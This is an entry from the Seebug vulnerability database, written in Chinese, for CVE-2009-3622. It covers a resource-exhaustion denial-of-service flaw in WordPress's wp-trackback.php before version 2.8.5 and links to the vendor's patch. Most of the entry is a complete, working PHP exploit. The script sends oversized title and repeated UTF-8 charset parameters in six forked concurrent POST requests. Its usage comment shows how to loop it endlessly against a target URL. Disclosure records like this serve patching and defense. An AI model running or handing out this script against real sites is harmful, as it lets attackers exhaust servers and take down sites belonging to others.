WordPress Trackback脚本拒绝服务漏洞

2009-10-27T00:00:00
ID SSV:12520
Type seebug
Reporter Root
Modified 2009-10-27T00:00:00

Description

CVE ID: CVE-2009-3622

WordPress是一款免费的论坛Blog系统。

WordPress的wp-trackback.php脚本允许用户向mb_convert_encoding()函数提交多个源字符编码。如果远程攻击者在提交的HTTP请求中包含有超长的标题参数和由多个逗号分隔的UTF-8子字符串所组成的字符集参数,就可以占用大量CPU资源。

WordPress < 2.8.5 厂商补丁:

WordPress

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://wordpress.org/development/2009/10/wordpress-2-8-5-hardening-release/

                                        
                                            
                                                &lt;?php
/*
* wordpress Resource exhaustion Exploit
* http://rooibo.wordpress.com/
* security@wordpress.org contacted and get a response,
* but no solution available.
*
* [18/10/2009 20:31:00] modified by Zerial http://blog.zerial.org &lt;panic@zerial.org&gt;
*
* exploiting:
* you must install php-cli (command line interface)
* $ while /bin/true; do php wp-trackbacks_dos.php http://target.com/wordpress; done
*
*/
if(count($argv) &lt; 2)
    die(&quot;You need to specify a url to attack\n&quot;);
$url = $argv[1];
$data = parse_url($url);
if(count($data) &lt; 2)
    die(&quot;The url should have http:// in front of it, and should be complete.\n&quot;);
$path = (count($data)==2)?&quot;&quot;:$data['path'];
$path = trim($path,'/').'/wp-trackback.php';
if($path{0} != '/')
    $path = '/'.$path;
$b = &quot;&quot;; $b = str_pad($b,140000,'ABCEDFG').utf8_encode($b);
$charset = &quot;&quot;;
$charset = str_pad($charset,140000,&quot;UTF-8,&quot;);
$str = 'charset='.urlencode($charset);
$str .= '&amp;url=www.example.com';
$str .= '&amp;title='.$b;
$str .= '&amp;blog_name=lol';
$str .= '&amp;excerpt=lol';
for($n = 0; $n &lt;= 5; $n++){
    $fp = @fsockopen($data['host'],80);
        if(!$fp)
        die(&quot;unable to connect to: &quot;.$data['host'].&quot;\n&quot;);
    $pid[$n] = pcntl_fork();
    if(!$pid[$n]){
        fputs($fp, &quot;POST $path HTTP/1.1\r\n&quot;);
        fputs($fp, &quot;Host: &quot;.$data['host'].&quot;\r\n&quot;);
        fputs($fp, &quot;Content-type: application/x-www-form-urlencoded\r\n&quot;);
        fputs($fp, &quot;Content-length: &quot;.strlen($str).&quot;\r\n&quot;);
        fputs($fp, &quot;Connection: close\r\n\r\n&quot;);
        fputs($fp, $str.&quot;\r\n\r\n&quot;);
        echo &quot;hit!\n&quot;;
    }
}
?&gt;